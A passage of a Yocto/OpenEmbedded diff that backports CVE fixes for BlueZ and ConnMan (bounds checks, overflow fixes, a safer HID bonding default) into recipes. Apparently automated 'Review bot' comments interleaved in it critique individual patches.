+- ecode = check_permissions(server, attr, BT_ATT_PERM_READ |
+- BT_ATT_PERM_READ_AUTHEN |
+- BT_ATT_PERM_READ_ENCRYPT);
++ ecode = check_permissions(server, attr, BT_ATT_PERM_READ_MASK);
+ if (ecode)
+ goto error;
+
+@@ -811,9 +809,7 @@ static void write_cb(struct bt_att_chan *chan, uint8_t opcode, const void *pdu,
+ (opcode == BT_ATT_OP_WRITE_REQ) ? "Req" : "Cmd",
+ handle);
+
+- ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE |
+- BT_ATT_PERM_WRITE_AUTHEN |
+- BT_ATT_PERM_WRITE_ENCRYPT);
++ ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK);
+ if (ecode)
+ goto error;
+
+@@ -913,9 +909,7 @@ static void handle_read_req(struct bt_att_chan *chan,
+ opcode == BT_ATT_OP_READ_BLOB_REQ ? "Blob " : "",
+ handle);
+
+- ecode = check_permissions(server, attr, BT_ATT_PERM_READ |
+- BT_ATT_PERM_READ_AUTHEN |
+- BT_ATT_PERM_READ_ENCRYPT);
++ ecode = check_permissions(server, attr, BT_ATT_PERM_READ_MASK);
+ if (ecode)
+ goto error;
+
+@@ -1051,9 +1045,8 @@ static void read_multiple_complete_cb(struct gatt_db_attribute *attr, int err,
+ goto error;
+ }
+
+- ecode = check_permissions(data->server, next_attr, BT_ATT_PERM_READ |
+- BT_ATT_PERM_READ_AUTHEN |
+- BT_ATT_PERM_READ_ENCRYPT);
++ ecode = check_permissions(data->server, next_attr,
++ BT_ATT_PERM_READ_MASK);
+ if (ecode)
+ goto error;
+
+@@ -1129,9 +1122,7 @@ static void read_multiple_cb(struct bt_att_chan *chan, uint8_t opcode,
+ goto error;
+ }
+
+- ecode = check_permissions(data->server, attr, BT_ATT_PERM_READ |
+- BT_ATT_PERM_READ_AUTHEN |
+- BT_ATT_PERM_READ_ENCRYPT);
++ ecode = check_permissions(data->server, attr, BT_ATT_PERM_READ_MASK);
+ if (ecode)
+ goto error;
+
+@@ -1308,9 +1299,7 @@ static void prep_write_cb(struct bt_att_chan *chan, uint8_t opcode,
+ util_debug(server->debug_callback, server->debug_data,
+ "Prep Write Req - handle: 0x%04x", handle);
+
+- ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE |
+- BT_ATT_PERM_WRITE_AUTHEN |
+- BT_ATT_PERM_WRITE_ENCRYPT);
++ ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK);
+ if (ecode)
+ goto error;
+
+--
+cgit 1.2.3-1.el7
+
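Review bot: The two new masks in att-types.h (`BT_ATT_PERM_READ_MASK`, `BT_ATT_PERM_WRITE_MASK`) carry no comment, yet the commit message says the fix depends on every permission bit valid for the operation being present in the mask passed to check_permissions. A comment above them, for example `/* Masks for check_permissions(): must list every read (or write) permission bit defined above */`, would keep a future permission flag from being left out the same way. The statement about check_permissions comes from the commit message; its body is not part of these hunks.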
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3588.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3588.patch
new file mode 100644
index 0000000000..f52ff47a06
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3588.patch
@@ -0,0 +1,34 @@
+From 3a40bef49305f8327635b81ac8be52a3ca063d5a Mon Sep 17 00:00:00 2001
+From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
+Date: Mon, 4 Jan 2021 10:38:31 -0800
+Subject: [PATCH] gatt: Fix potential buffer out-of-bound
+
+When client features is read check if the offset is within the cli_feat
+bounds.
+
+Fixes: https://github.com/bluez/bluez/issues/70
+
++Upstream-Status: Backport [https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/?id=3a40bef49305f8327635b81ac8be52a3ca063d5a]
++Signed-off-by: Steve Sakoman <steve@sakoman.com>
++CVE: CVE-2021-3588
+
+---
+ src/gatt-database.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/src/gatt-database.c b/src/gatt-database.c
+index 90cc4bade..f2d7b5821 100644
+--- a/src/gatt-database.c
++++ b/src/gatt-database.c
+@@ -1075,6 +1075,11 @@ static void cli_feat_read_cb(struct gatt_db_attribute *attrib,
+ goto done;
+ }
+
++ if (offset >= sizeof(state->cli_feat)) {
++ ecode = BT_ATT_ERROR_INVALID_OFFSET;
++ goto done;
++ }
++
+ len = sizeof(state->cli_feat) - offset;
+ value = len ? &state->cli_feat[offset] : NULL;
+
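Review bot: The three tag lines in this patch header (`Upstream-Status`, `Signed-off-by`, `CVE`) were added with a leading `+` of their own, so inside the patch file they read `+Upstream-Status: ...` instead of starting at column 0 like the tags in the other patches of this series. Tooling that matches these tags at the start of a line may not recognise them; dropping the stray `+` gives the usual `Upstream-Status: Backport [...]` and `CVE: CVE-2021-3588`. Separately, after the new `offset >= sizeof(state->cli_feat)` check `len` can no longer be zero, so the `len ? ... : NULL` on the following context line is now dead code.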
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3658.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3658.patch
new file mode 100644
index 0000000000..1738ca13da
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3658.patch
@@ -0,0 +1,95 @@
+From b497b5942a8beb8f89ca1c359c54ad67ec843055 Mon Sep 17 00:00:00 2001
+From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
+Date: Thu, 24 Jun 2021 16:32:04 -0700
+Subject: [PATCH] adapter: Fix storing discoverable setting
+
+discoverable setting shall only be store when changed via Discoverable
+property and not when discovery client set it as that be considered
+temporary just for the lifetime of the discovery.
+
+Upstream-Status: Backport [https://github.com/bluez/bluez/commit/b497b5942a8beb8f89ca1c359c54ad67ec843055]
+Signed-off-by:Minjae Kim <flowergom@gmail.com>
+---
+ src/adapter.c | 35 ++++++++++++++++++++++-------------
+ 1 file changed, 22 insertions(+), 13 deletions(-)
+
+diff --git a/src/adapter.c b/src/adapter.c
+index 12e4ff5c0..663b778e4 100644
+--- a/src/adapter.c
++++ b/src/adapter.c
+@@ -560,7 +560,11 @@ static void settings_changed(struct btd_adapter *adapter, uint32_t settings)
+ if (changed_mask & MGMT_SETTING_DISCOVERABLE) {
+ g_dbus_emit_property_changed(dbus_conn, adapter->path,
+ ADAPTER_INTERFACE, "Discoverable");
+- store_adapter_info(adapter);
++ /* Only persist discoverable setting if it was not set
++ * temporarily by discovery.
++ */
++ if (!adapter->discovery_discoverable)
++ store_adapter_info(adapter);
+ btd_adv_manager_refresh(adapter->adv_manager);
+ }
+
+@@ -2162,8 +2166,6 @@ static bool filters_equal(struct mgmt_cp_start_service_discovery *a,
+ static int update_discovery_filter(struct btd_adapter *adapter)
+ {
+ struct mgmt_cp_start_service_discovery *sd_cp;
+- GSList *l;
+-
+
+ DBG("");
+
+@@ -2173,17 +2175,24 @@ static int update_discovery_filter(struct btd_adapter *adapter)
+ return -ENOMEM;
+ }
+
+- for (l = adapter->discovery_list; l; l = g_slist_next(l)) {
+- struct discovery_client *client = l->data;
++ /* Only attempt to overwrite current discoverable setting when not
++ * discoverable.
++ */
++ if (!(adapter->current_settings & MGMT_OP_SET_DISCOVERABLE)) {
++ GSList *l;
+
+- if (!client->discovery_filter)
+- continue;
++ for (l = adapter->discovery_list; l; l = g_slist_next(l)) {
++ struct discovery_client *client = l->data;
+
+- if (client->discovery_filter->discoverable)
+- break;
+- }
++ if (!client->discovery_filter)
++ continue;
+
+- set_discovery_discoverable(adapter, l ? true : false);
++ if (client->discovery_filter->discoverable) {
++ set_discovery_discoverable(adapter, true);
++ break;
++ }
++ }
++ }
+
+ /*
+ * If filters are equal, then don't update scan, except for when
+@@ -2216,8 +2225,7 @@ static int discovery_stop(struct discovery_client *client)
+ return 0;
+ }
+
+- if (adapter->discovery_discoverable)
+- set_discovery_discoverable(adapter, false);
++ set_discovery_discoverable(adapter, false);
+
+ /*
+ * In the idle phase of a discovery, there is no need to stop it
+@@ -6913,6 +6921,7 @@ static void adapter_stop(struct btd_adapter *adapter)
+ g_free(adapter->current_discovery_filter);
+ adapter->current_discovery_filter = NULL;
+
++ set_discovery_discoverable(adapter, false);
+ adapter->discovering = false;
+
+ while (adapter->connections) {
+--
+2.25.1
+
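Review bot: In the update_discovery_filter hunk the new guard masks `adapter->current_settings` with `MGMT_OP_SET_DISCOVERABLE`, which by its name is a management command opcode, whereas the settings_changed hunk of the same patch tests the settings bit `MGMT_SETTING_DISCOVERABLE`. With an opcode as the mask the test looks at unrelated settings bits, so the discoverable state may be judged wrongly; the intended line is presumably `if (!(adapter->current_settings & MGMT_SETTING_DISCOVERABLE)) {`. The code matches the cited upstream commit, so check whether upstream has a follow-up fix that should be backported with it. The header also lacks a `CVE: CVE-2021-3658` tag, unlike the other patches added here.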
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-0204.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-0204.patch
new file mode 100644
index 0000000000..646b5ddfc8
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-0204.patch
@@ -0,0 +1,66 @@
+From 0d328fdf6564b67fc2ec3533e3da201ebabcc9e3 Mon Sep 17 00:00:00 2001
+From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
+Date: Tue, 8 Jun 2021 16:46:49 -0700
+Subject: [PATCH] shared/gatt-server: Fix heap overflow when appending prepare
+ writes
+
+The code shall check if the prepare writes would append more the
+allowed maximum attribute length.
+
+Fixes https://github.com/bluez/bluez/security/advisories/GHSA-479m-xcq5-9g2q
+
+Upstream-Status: Backport [https://github.com/bluez/bluez/commit/591c546c536b42bef696d027f64aa22434f8c3f0]
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+CVE: CVE-2022-0204
+
+---
+ src/shared/gatt-server.c | 22 ++++++++++++++++++++++
+ 1 file changed, 22 insertions(+)
+
+diff --git a/src/shared/gatt-server.c b/src/shared/gatt-server.c
+index 0c25a97..20e14bc 100644
+--- a/src/shared/gatt-server.c
++++ b/src/shared/gatt-server.c
+@@ -816,6 +816,20 @@ static uint8_t authorize_req(struct bt_gatt_server *server,
+ server->authorize_data);
+ }
+
++static uint8_t check_length(uint16_t length, uint16_t offset)
++{
++ if (length > BT_ATT_MAX_VALUE_LEN)
++ return BT_ATT_ERROR_INVALID_ATTRIBUTE_VALUE_LEN;
++
++ if (offset > BT_ATT_MAX_VALUE_LEN)
++ return BT_ATT_ERROR_INVALID_OFFSET;
++
++ if (length + offset > BT_ATT_MAX_VALUE_LEN)
++ return BT_ATT_ERROR_INVALID_ATTRIBUTE_VALUE_LEN;
++
++ return 0;
++}
++
+ static void write_cb(struct bt_att_chan *chan, uint8_t opcode, const void *pdu,
+ uint16_t length, void *user_data)
+ {
+@@ -846,6 +860,10 @@ static void write_cb(struct bt_att_chan *chan, uint8_t opcode, const void *pdu,
+ (opcode == BT_ATT_OP_WRITE_REQ) ? "Req" : "Cmd",
+ handle);
+
++ ecode = check_length(length, 0);
++ if (ecode)
++ goto error;
++
+ ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK);
+ if (ecode)
+ goto error;
+@@ -1353,6 +1371,10 @@ static void prep_write_cb(struct bt_att_chan *chan, uint8_t opcode,
+ util_debug(server->debug_callback, server->debug_data,
+ "Prep Write Req - handle: 0x%04x", handle);
+
++ ecode = check_length(length, offset);
++ if (ecode)
++ goto error;
++
+ ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK);
+ if (ecode)
+ goto error;
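Review bot: `check_length()` has no comment, and its third test `length + offset > BT_ATT_MAX_VALUE_LEN` is only safe because both `uint16_t` operands are promoted to `int` before the addition, so the sum cannot wrap at 16 bits. A short comment such as `/* length + offset is evaluated as int, so the sum cannot wrap */` would make that explicit for anyone who later changes the parameter types. In write_cb the value passed is the callback's `length` parameter; whether that still includes the attribute handle bytes is not visible in the hunk, so confirm the bound is applied to the value length that is meant.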
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-3637.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-3637.patch
new file mode 100644
index 0000000000..4ca60f99d5
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-3637.patch
@@ -0,0 +1,39 @@
+From b808b2852a0b48c6f9dbb038f932613cea3126c2 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 27 Oct 2022 09:51:27 +0530
+Subject: [PATCH] CVE-2022-3637
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/monitor/jlink.c?id=1d6cfb8e625a944010956714c1802bc1e1fc6c4f]
+CVE: CVE-2022-3637
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+monitor: Fix crash when using RTT backend
+
+This fix regression introduced by "monitor: Fix memory leaks".
+J-Link shared library is in use if jlink_init() returns 0 and thus
+handle shall not be closed.
+---
+ monitor/jlink.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/monitor/jlink.c b/monitor/jlink.c
+index afa9d93..5bd4aed 100644
+--- a/monitor/jlink.c
++++ b/monitor/jlink.c
+@@ -120,9 +120,12 @@ int jlink_init(void)
+ !jlink.tif_select || !jlink.setspeed ||
+ !jlink.connect || !jlink.getsn ||
+ !jlink.emu_getproductname ||
+- !jlink.rtterminal_control || !jlink.rtterminal_read)
++ !jlink.rtterminal_control || !jlink.rtterminal_read) {
++ dlclose(so);
+ return -EIO;
++ }
+
++ /* don't dlclose(so) here cause symbols from it are in use now */
+ return 0;
+ }
+
+--
+2.25.1
+
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-39176.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-39176.patch
new file mode 100644
index 0000000000..7bd1f5f80f
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-39176.patch
@@ -0,0 +1,126 @@
+From 752c7f707c3cc1eb12eadc13bc336a5c484d4bdf Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 28 Sep 2022 10:45:53 +0530
+Subject: [PATCH] CVE-2022-39176
+
+Upstream-Status: Backport [https://launchpad.net/ubuntu/+source/bluez/5.53-0ubuntu3.6]
+CVE: CVE-2022-39176
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ profiles/audio/avdtp.c | 56 +++++++++++++++++++++++++++---------------
+ profiles/audio/avrcp.c | 8 ++++++
+ 2 files changed, 44 insertions(+), 20 deletions(-)
+
+diff --git a/profiles/audio/avdtp.c b/profiles/audio/avdtp.c
+index 782268c..0adf413 100644
+--- a/profiles/audio/avdtp.c
++++ b/profiles/audio/avdtp.c
+@@ -1261,43 +1261,53 @@ struct avdtp_remote_sep *avdtp_find_remote_sep(struct avdtp *session,
+ return NULL;
+ }
+
+-static GSList *caps_to_list(uint8_t *data, int size,
++static GSList *caps_to_list(uint8_t *data, size_t size,
+ struct avdtp_service_capability **codec,
+ gboolean *delay_reporting)
+ {
++ struct avdtp_service_capability *cap;
+ GSList *caps;
+- int processed;
+
+ if (delay_reporting)
+ *delay_reporting = FALSE;
+
+- for (processed = 0, caps = NULL; processed + 2 <= size;) {
+- struct avdtp_service_capability *cap;
+- uint8_t length, category;
++ if (size < sizeof(*cap))
++ return NULL;
++
++ for (caps = NULL; size >= sizeof(*cap);) {
++ struct avdtp_service_capability *cpy;
+
+- category = data[0];
+- length = data[1];
++ cap = (struct avdtp_service_capability *)data;
+
+- if (processed + 2 + length > size) {
++ if (sizeof(*cap) + cap->length > size) {
+ error("Invalid capability data in getcap resp");
+ break;
+ }
+
+- cap = g_malloc(sizeof(struct avdtp_service_capability) +
+- length);
+- memcpy(cap, data, 2 + length);
++ if (cap->category == AVDTP_MEDIA_CODEC &&
++ cap->length < sizeof(**codec)) {
++ error("Invalid codec data in getcap resp");
++ break;
++ }
++
++ cpy = btd_malloc(sizeof(*cpy) + cap->length);
++ memcpy(cpy, cap, sizeof(*cap) + cap->length);
+
+- processed += 2 + length;
+- data += 2 + length;
++ size -= sizeof(*cap) + cap->length;
++ data += sizeof(*cap) + cap->length;
+
+- caps = g_slist_append(caps, cap);
++ caps = g_slist_append(caps, cpy);
+
+- if (category == AVDTP_MEDIA_CODEC &&
+- length >=
+- sizeof(struct avdtp_media_codec_capability))
+- *codec = cap;
+- else if (category == AVDTP_DELAY_REPORTING && delay_reporting)
+- *delay_reporting = TRUE;
++ switch (cap->category) {
++ case AVDTP_MEDIA_CODEC:
++ if (codec)
++ *codec = cpy;
++ break;
++ case AVDTP_DELAY_REPORTING:
++ if (delay_reporting)
++ *delay_reporting = TRUE;
++ break;
++ }
+ }
+
+ return caps;
+@@ -1494,6 +1504,12 @@ static gboolean avdtp_setconf_cmd(struct avdtp *session, uint8_t transaction,
+ &stream->codec,
+ &stream->delay_reporting);
+
++ if (!stream->caps || !stream->codec) {
++ err = AVDTP_UNSUPPORTED_CONFIGURATION;
++ category = 0x00;
++ goto failed_stream;
++ }
++
+ /* Verify that the Media Transport capability's length = 0. Reject otherwise */
+ for (l = stream->caps; l != NULL; l = g_slist_next(l)) {
+ struct avdtp_service_capability *cap = l->data;
+diff --git a/profiles/audio/avrcp.c b/profiles/audio/avrcp.c
+index d9471c0..0233d53 100644
+--- a/profiles/audio/avrcp.c
++++ b/profiles/audio/avrcp.c
+@@ -1916,6 +1916,14 @@ static size_t handle_vendordep_pdu(struct avctp *conn, uint8_t transaction,
+ goto err_metadata;
+ }
+
++ operands += sizeof(*pdu);
++ operand_count -= sizeof(*pdu);
++
++ if (pdu->params_len != operand_count) {
++ DBG("AVRCP PDU parameters length don't match");
++ pdu->params_len = operand_count;
++ }
++
+ for (handler = session->control_handlers; handler->pdu_id; handler++) {
+ if (handler->pdu_id == pdu->pdu_id)
+ break;
+--
+2.25.1
+
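Review bot: In the avrcp.c hunk `pdu->params_len` is compared with, and then overwritten by, the host-order `operand_count`. If the field is still in wire (big-endian) order at this point, which the hunk does not show, the comparison would fail on little-endian hosts and the rewrite would store a byte-swapped length for the handlers. In that case the lines should read `if (ntohs(pdu->params_len) != operand_count) {` and `pdu->params_len = htons(operand_count);`. The subtraction `operand_count -= sizeof(*pdu)` also relies on an earlier size check in handle_vendordep_pdu, whose body starts outside the hunk.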
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2023-45866.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2023-45866.patch
new file mode 100644
index 0000000000..43670ab2b3
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2023-45866.patch
@@ -0,0 +1,54 @@
+From 25a471a83e02e1effb15d5a488b3f0085eaeb675 Mon Sep 17 00:00:00 2001
+From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
+Date: Tue, 10 Oct 2023 13:03:12 -0700
+Subject: input.conf: Change default of ClassicBondedOnly
+
+This changes the default of ClassicBondedOnly since defaulting to false
+is not inline with HID specification which mandates the of Security Mode
+4:
+
+BLUETOOTH SPECIFICATION Page 84 of 123
+Human Interface Device (HID) Profile:
+
+5.4.3.4.2 Security Modes
+Bluetooth HID Hosts shall use Security Mode 4 when interoperating with
+Bluetooth HID devices that are compliant to the Bluetooth Core
+Specification v2.1+EDR[6].
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/?id=25a471a83e02e1effb15d5a488b3f0085eaeb675]
+CVE: CVE-2023-45866
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ profiles/input/device.c | 2 +-
+ profiles/input/input.conf | 2 +-
+ 2 files changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/profiles/input/device.c b/profiles/input/device.c
+index 375314e..0236488 100644
+--- a/profiles/input/device.c
++++ b/profiles/input/device.c
+@@ -93,7 +93,7 @@ struct input_device {
+
+ static int idle_timeout = 0;
+ static bool uhid_enabled = false;
+-static bool classic_bonded_only = false;
++static bool classic_bonded_only = true;
+
+ void input_set_idle_timeout(int timeout)
+ {
+diff --git a/profiles/input/input.conf b/profiles/input/input.conf
+index 4c70bc5..d8645f3 100644
+--- a/profiles/input/input.conf
++++ b/profiles/input/input.conf
+@@ -17,7 +17,7 @@
+ # platforms may want to make sure that input connections only come from bonded
+ # device connections. Several older mice have been known for not supporting
+ # pairing/encryption.
+-# Defaults to false to maximize device compatibility.
++# Defaults to true for security.
+ #ClassicBondedOnly=true
+
+ # LE upgrade security
+--
+2.25.1
+
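Review bot: The input.conf hunk changes the comment to `Defaults to true for security.` but leaves the example as `#ClassicBondedOnly=true`, which now only restates the default and no longer shows how to restore the earlier behaviour. This backport changes runtime behaviour on a stable branch: going by the surrounding comment, input connections from devices that are not bonded are no longer accepted by default. The comment would serve integrators better as `# Defaults to true for security; set to false only if unbonded legacy devices must be supported.` with the example line `#ClassicBondedOnly=false`.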
diff --git a/meta/recipes-connectivity/bluez5/bluez5_5.55.bb b/meta/recipes-connectivity/bluez5/bluez5_5.55.bb
index 8190924562..be74a35e0a 100644
--- a/meta/recipes-connectivity/bluez5/bluez5_5.55.bb
+++ b/meta/recipes-connectivity/bluez5/bluez5_5.55.bb
@@ -3,6 +3,16 @@ require bluez5.inc
SRC_URI[md5sum] = "94972b8bc7ade60c72b0ffa6ccff2c0a"
SRC_URI[sha256sum] = "8863717113c4897e2ad3271fc808ea245319e6fd95eed2e934fae8e0894e9b88"
+# These issues have kernel fixes rather than bluez fixes so exclude here
+CVE_CHECK_WHITELIST += "CVE-2020-12352 CVE-2020-24490"
+
+# Commit 7a80d2096f1b7125085e21448112aa02f49f5e9a, e2b0f0d8d63e1223bb714a9efb37e2257818268b
+# and 0388794dc5fdb73a4ea88bcf148de0a12b4364d4 to fix CVE-2022-39177
+# already backport in CVE-2022-39176.patch
+# https://bugs.launchpad.net/ubuntu/+source/bluez/+bug/1977968
+
+CVE_CHECK_WHITELIST += "CVE-2022-39177"
+
# noinst programs in Makefile.tools that are conditional on READLINE
# support
NOINST_TOOLS_READLINE ?= " \
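Review bot: CVE-2022-39177 is put on `CVE_CHECK_WHITELIST` with a comment saying its fix is already contained in CVE-2022-39176.patch, which makes the checker ignore the CVE rather than record it as patched. Listing both ids in that patch's header, `CVE: CVE-2022-39176 CVE-2022-39177`, would keep the evidence next to the code and make this whitelist entry unnecessary. The patch header cites only the Ubuntu package under `Upstream-Status`, so the three upstream commit ids named in this comment would be worth repeating there for auditability.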
diff --git a/meta/recipes-connectivity/connman/connman-gnome_0.7.bb b/meta/recipes-connectivity/connman/connman-gnome_0.7.bb
index 778bf50191..24593d6258 100644
--- a/meta/recipes-connectivity/connman/connman-gnome_0.7.bb
+++ b/meta/recipes-connectivity/connman/connman-gnome_0.7.bb
@@ -10,7 +10,7 @@ DEPENDS = "gtk+3 dbus-glib dbus-glib-native intltool-native gettext-native"
# 0.7 tag
SRCREV = "cf3c325b23dae843c5499a113591cfbc98acb143"
-SRC_URI = "git://github.com/connectivity/connman-gnome.git \
+SRC_URI = "git://github.com/connectivity/connman-gnome.git;branch=master;protocol=https \
file://0001-Removed-icon-from-connman-gnome-about-applet.patch \
file://null_check_for_ipv4_config.patch \
file://images/* \
diff --git a/meta/recipes-connectivity/connman/connman.inc b/meta/recipes-connectivity/connman/connman.inc
index 55e5bf97c7..c495ae29ad 100644
--- a/meta/recipes-connectivity/connman/connman.inc
+++ b/meta/recipes-connectivity/connman/connman.inc
@@ -15,6 +15,8 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e \
inherit autotools pkgconfig systemd update-rc.d update-alternatives
+CVE_PRODUCT = "connman connection_manager"
+
DEPENDS = "dbus glib-2.0 ppp"
INC_PR = "r20"
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2021-26675.patch b/meta/recipes-connectivity/connman/connman/CVE-2021-26675.patch
new file mode 100644
index 0000000000..2648a832ca
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2021-26675.patch
@@ -0,0 +1,62 @@
+From e4079a20f617a4b076af503f6e4e8b0304c9f2cb Mon Sep 17 00:00:00 2001
+From: Colin Wee <cwee@tesla.com>
+Date: Thu, 28 Jan 2021 19:41:53 +0100
+Subject: [PATCH] dnsproxy: Add length checks to prevent buffer overflow
+
+Fixes: CVE-2021-26675
+
+Upstream-Status: Backport
+CVE: CVE-2021-26675
+
+Reference to upstream patch:
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=e4079a20f617a4b076af503f6e4e8b0304c9f2cb
+
+Signed-off-by: Catalin Enache <catalin.enache@windriver.com>
+---
+ src/dnsproxy.c | 14 +++++++++++---
+ 1 file changed, 11 insertions(+), 3 deletions(-)
+
+diff --git a/src/dnsproxy.c b/src/dnsproxy.c
+index a7bf87a1..4f5c897f 100644
+--- a/src/dnsproxy.c
++++ b/src/dnsproxy.c
+@@ -1767,6 +1767,7 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+ char **uncompressed_ptr)
+ {
+ char *uptr = *uncompressed_ptr; /* position in result buffer */
++ char * const uncomp_end = uncompressed + uncomp_len - 1;
+
+ debug("count %d ptr %p end %p uptr %p", field_count, ptr, end, uptr);
+
+@@ -1787,12 +1788,15 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+ * tmp buffer.
+ */
+
+- ulen = strlen(name);
+- strncpy(uptr, name, uncomp_len - (uptr - uncompressed));
+-
+ debug("pos %d ulen %d left %d name %s", pos, ulen,
+ (int)(uncomp_len - (uptr - uncompressed)), uptr);
+
++ ulen = strlen(name);
++ if ((uptr + ulen + 1) > uncomp_end) {
++ goto out;
++ }
++ strncpy(uptr, name, uncomp_len - (uptr - uncompressed));
++
+ uptr += ulen;
+ *uptr++ = '\0';
+
+@@ -1802,6 +1806,10 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+ * We copy also the fixed portion of the result (type, class,
+ * ttl, address length and the address)
+ */
++ if ((uptr + NS_RRFIXEDSZ) > uncomp_end) {
++ debug("uncompressed data too large for buffer");
++ goto out;
++ }
+ memcpy(uptr, ptr, NS_RRFIXEDSZ);
+
+ dns_type = uptr[0] << 8 | uptr[1];
+--
+2.17.1
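Review bot: Moving the `debug("pos %d ulen %d left %d name %s", ...)` call above `ulen = strlen(name);` makes it log `ulen` before the value for this name is assigned and format `uptr` with `%s` before anything has been copied there, so the debug path reads stale or possibly unterminated buffer contents. The call belongs after the length check and copy, or it should print the source string, e.g. `debug("pos %d ulen %d left %d name %s", pos, ulen, (int)(uncomp_len - (uptr - uncompressed)), name);` placed after the `strlen`. The CVE-2021-33833 patch later in this series says it fixes debug message output, but its hunks are not in view here. uncompress() starts and ends outside these hunks.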
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0001.patch b/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0001.patch
new file mode 100644
index 0000000000..4104e4bfc6
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0001.patch
@@ -0,0 +1,231 @@
+From 58d397ba74873384aee449690a9070bacd5676fa Mon Sep 17 00:00:00 2001
+From: Colin Wee <cwee@tesla.com>
+Date: Thu, 28 Jan 2021 19:39:14 +0100
+Subject: [PATCH] gdhcp: Avoid reading invalid data in dhcp_get_option
+
+Upstream-Status: Backport
+CVE: CVE-2021-26676
+
+Reference to upstream patch:
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=58d397ba74873384aee449690a9070bacd5676fa
+
+Signed-off-by: Catalin Enache <catalin.enache@windriver.com>
+---
+ gdhcp/client.c | 20 +++++++++++---------
+ gdhcp/common.c | 24 +++++++++++++++++++-----
+ gdhcp/common.h | 2 +-
+ gdhcp/server.c | 12 +++++++-----
+ 4 files changed, 38 insertions(+), 20 deletions(-)
+
+diff --git a/gdhcp/client.c b/gdhcp/client.c
+index 09dfe5ec..6a5613e7 100644
+--- a/gdhcp/client.c
++++ b/gdhcp/client.c
+@@ -1629,12 +1629,12 @@ static void start_request(GDHCPClient *dhcp_client)
+ NULL);
+ }
+
+-static uint32_t get_lease(struct dhcp_packet *packet)
++static uint32_t get_lease(struct dhcp_packet *packet, uint16_t packet_len)
+ {
+ uint8_t *option;
+ uint32_t lease_seconds;
+
+- option = dhcp_get_option(packet, DHCP_LEASE_TIME);
++ option = dhcp_get_option(packet, packet_len, DHCP_LEASE_TIME);
+ if (!option)
+ return 3600;
+
+@@ -2226,7 +2226,8 @@ static void get_dhcpv6_request(GDHCPClient *dhcp_client,
+ }
+ }
+
+-static void get_request(GDHCPClient *dhcp_client, struct dhcp_packet *packet)
++static void get_request(GDHCPClient *dhcp_client, struct dhcp_packet *packet,
++ uint16_t packet_len)
+ {
+ GDHCPOptionType type;
+ GList *list, *value_list;
+@@ -2237,7 +2238,7 @@ static void get_request(GDHCPClient *dhcp_client, struct dhcp_packet *packet)
+ for (list = dhcp_client->request_list; list; list = list->next) {
+ code = (uint8_t) GPOINTER_TO_INT(list->data);
+
+- option = dhcp_get_option(packet, code);
++ option = dhcp_get_option(packet, packet_len, code);
+ if (!option) {
+ g_hash_table_remove(dhcp_client->code_value_hash,
+ GINT_TO_POINTER((int) code));
+@@ -2297,6 +2298,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ re = dhcp_recv_l2_packet(&packet,
+ dhcp_client->listener_sockfd,
+ &dst_addr);
++ pkt_len = (uint16_t)(unsigned int)re;
+ xid = packet.xid;
+ } else if (dhcp_client->listen_mode == L3) {
+ if (dhcp_client->type == G_DHCP_IPV6) {
+@@ -2361,7 +2363,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
